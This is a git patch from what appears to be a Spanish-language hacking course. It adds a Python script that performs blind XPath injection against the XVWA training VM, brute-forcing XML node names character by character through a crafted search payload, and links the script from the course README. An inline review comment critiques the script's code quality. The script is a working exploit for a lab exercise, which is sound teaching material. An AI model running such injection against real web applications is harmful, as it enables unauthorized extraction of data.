From b705ffba313e921ee4b061e13343c7a9ac1e5af7 Mon Sep 17 00:00:00 2001
From: Manuel Vergara
Date: Sun, 25 Feb 2024 18:59:04 +0100
Subject: [PATCH] Update tema 6
---
.../tema_6_owasp/26_xpath/xpath_injection.py | 69 +++++++++++++++++++
.../tema_6_owasp/README7.md | 1 +
2 files changed, 70 insertions(+)
create mode 100644 Introduccion-hacking-hack4u/tema_6_owasp/26_xpath/xpath_injection.py
diff --git a/Introduccion-hacking-hack4u/tema_6_owasp/26_xpath/xpath_injection.py b/Introduccion-hacking-hack4u/tema_6_owasp/26_xpath/xpath_injection.py
new file mode 100644
index 0000000..03e4648
--- /dev/null
+++ b/Introduccion-hacking-hack4u/tema_6_owasp/26_xpath/xpath_injection.py
@@ -0,0 +1,69 @@
+#!/var/bin/env python
+
+
+import pdb
+import requests
+import signal
+import string
+import sys
+import time
+
+from pwn import *
+
+# Ctrl-C handler
+
+
+def signal_handler(signal, frame):
+
+ print('\n\n[!] Ctrl-C. Saliendo...')
+ sys.exit(1)
+
+
+signal.signal(signal.SIGINT, signal_handler)
+
+
+# Variables globales
+
+main_url = "http://192.168.1.142/xvwa/vulnerabilities/xpath/"
+characters = string.ascii_letters
+
+
+def xPathInjection():
+
+ data = ""
+
+ p1 = log.progress("Inyeccion XPath")
+ p1.status("Iniciando ataque de fuerza bruta")
+
+ time.sleep(2)
+
+ p2 = log.progress("Data")
+
+ for position in range(1, 8):
+
+ for character in characters:
+ # post_data = {
+ # 'search': "1' and substring(name(/*[1]),%d,1)='%s" % (position, character),
+ # 'submit': ''
+ # }
+
+ post_data = {
+ 'search': "1' and substring(name(/*[1]/*[1]),%d,1)='%s" % (position, character),
+ 'submit': ''
+ }
+
+ r = requests.post(main_url, data=post_data)
+
+ if len(r.text) != 8686:
+
+ data += character
+ p2.status(data)
+ break
+
+ p1.success("Inyeccion XPath completada")
+ p2.success("Data: %s" % data)
+
+
+if __name__ == "__main__":
+
+ xPathInjection()
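Review bot: The shebang on the first added line, `#!/var/bin/env python`, names a path that does not exist on standard systems, so the script fails when executed directly; it should read `#!/usr/bin/env python`. The call `requests.post(main_url, data=post_data)` sets no timeout, so a single stalled response from the lab VM blocks the loop indefinitely; `requests.post(main_url, data=post_data, timeout=10)` bounds it. The literal `8686` in `if len(r.text) != 8686:` is unexplained and presumably tied to this one XVWA lab page, so it deserves a named constant with a comment such as `# response length of the lab page when the condition is false (XVWA-specific, re-measure if the page changes)`. `import pdb` is unused, and the handler parameter in `signal_handler(signal, frame)` shadows the `signal` module; renaming it to `signum` avoids the confusion.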
diff --git a/Introduccion-hacking-hack4u/tema_6_owasp/README7.md b/Introduccion-hacking-hack4u/tema_6_owasp/README7.md index 5451925..aa67258 100644 --- a/Introduccion-hacking-hack4u/tema_6_owasp/README7.md +++ b/Introduccion-hacking-hack4u/tema_6_owasp/README7.md @@ -39,6 +39,7 @@ Para protegerse contra las vulnerabilidades de XPath, es importante validar toda A continuación, se proporciona el enlace directo de descarga a la máquina XVWA 1 de Vulnhub, la cual usamos en esta clase para explotar las vulnerabilidades existentes en XPath: - XVWA 1: https://www.vulnhub.com/entry/xtreme-vulnerable-web-application-xvwa-1,209/ +- script Python [xpath_injection.py](./26_xpath/xpath_injection.py) ## 6.27 Insecure Direct Object Reference (IDORs)